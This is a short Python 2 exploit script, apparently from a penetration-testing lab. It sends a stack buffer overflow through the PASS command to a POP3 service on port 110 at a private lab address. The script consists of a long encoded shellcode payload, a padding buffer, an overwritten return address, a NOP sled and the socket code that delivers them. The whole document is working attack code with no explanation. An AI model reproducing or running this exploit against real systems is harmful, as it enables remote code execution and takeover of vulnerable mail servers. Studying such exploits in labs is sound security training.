#!/usr/bin/python2.7

import socket

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#badchar \x0a,\x0d\,x00
shellcode=("\xbd\xe2\x2a\x68\x9e\xdb\xd7\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x83\xc0\x04\x31\x68\x0e\x03\x8a\x24\x8a\x6b\xb6\xd1\xc8"
"\x94\x46\x22\xad\x1d\xa3\x13\xed\x7a\xa0\x04\xdd\x09\xe4\xa8"
"\x96\x5c\x1c\x3a\xda\x48\x13\x8b\x51\xaf\x1a\x0c\xc9\x93\x3d"
"\x8e\x10\xc0\x9d\xaf\xda\x15\xdc\xe8\x07\xd7\x8c\xa1\x4c\x4a"
"\x20\xc5\x19\x57\xcb\x95\x8c\xdf\x28\x6d\xae\xce\xff\xe5\xe9"
"\xd0\xfe\x2a\x82\x58\x18\x2e\xaf\x13\x93\x84\x5b\xa2\x75\xd5"
"\xa4\x09\xb8\xd9\x56\x53\xfd\xde\x88\x26\xf7\x1c\x34\x31\xcc"
"\x5f\xe2\xb4\xd6\xf8\x61\x6e\x32\xf8\xa6\xe9\xb1\xf6\x03\x7d"
"\x9d\x1a\x95\x52\x96\x27\x1e\x55\x78\xae\x64\x72\x5c\xea\x3f"
"\x1b\xc5\x56\x91\x24\x15\x39\x4e\x81\x5e\xd4\x9b\xb8\x3d\xb1"
"\x68\xf1\xbd\x41\xe7\x82\xce\x73\xa8\x38\x58\x38\x21\xe7\x9f"
"\x3f\x18\x5f\x0f\xbe\xa3\xa0\x06\x05\xf7\xf0\x30\xac\x78\x9b"
"\xc0\x51\xad\x0c\x90\xfd\x1e\xed\x40\xbe\xce\x85\x8a\x31\x30"
"\xb5\xb5\x9b\x59\x5c\x4c\x4c\x6c\xaa\x4e\xf5\x18\xae\x4e\x04"
"\x62\x27\xa8\x6c\x84\x6e\x63\x19\x3d\x2b\xff\xb8\xc2\xe1\x7a"
"\xfa\x49\x06\x7b\xb5\xb9\x63\x6f\x22\x4a\x3e\xcd\xe5\x55\x94"
"\x79\x69\xc7\x73\x79\xe4\xf4\x2b\x2e\xa1\xcb\x25\xba\x5f\x75"
"\x9c\xd8\x9d\xe3\xe7\x58\x7a\xd0\xe6\x61\x0f\x6c\xcd\x71\xc9"
"\x6d\x49\x25\x85\x3b\x07\x93\x63\x92\xe9\x4d\x3a\x49\xa0\x19"
"\xbb\xa1\x73\x5f\xc4\xef\x05\xbf\x75\x46\x50\xc0\xba\x0e\x54"
"\xb9\xa6\xae\x9b\x10\x63\xce\x79\xb0\x9e\x67\x24\x51\x23\xea"
"\xd7\x8c\x60\x13\x54\x24\x19\xe0\x44\x4d\x1c\xac\xc2\xbe\x6c"
"\xbd\xa6\xc0\xc3\xbe\xe2")

buffer="A"*2606 +"\x8f\x35\x4a\x5f"+"\x90"*8+ shellcode


try:
	print"\nSending evil buffer..."
	s.connect(('10.11.23.157',110))
	data = s.recv(1024)
	s.send('USER username' + '\r\n')
	data = s.recv(1024)
	s.send('PASS '+buffer+'\r\n')
	s.close()
	print "\nDone!!"
except:
	print "ERROR!!!!"
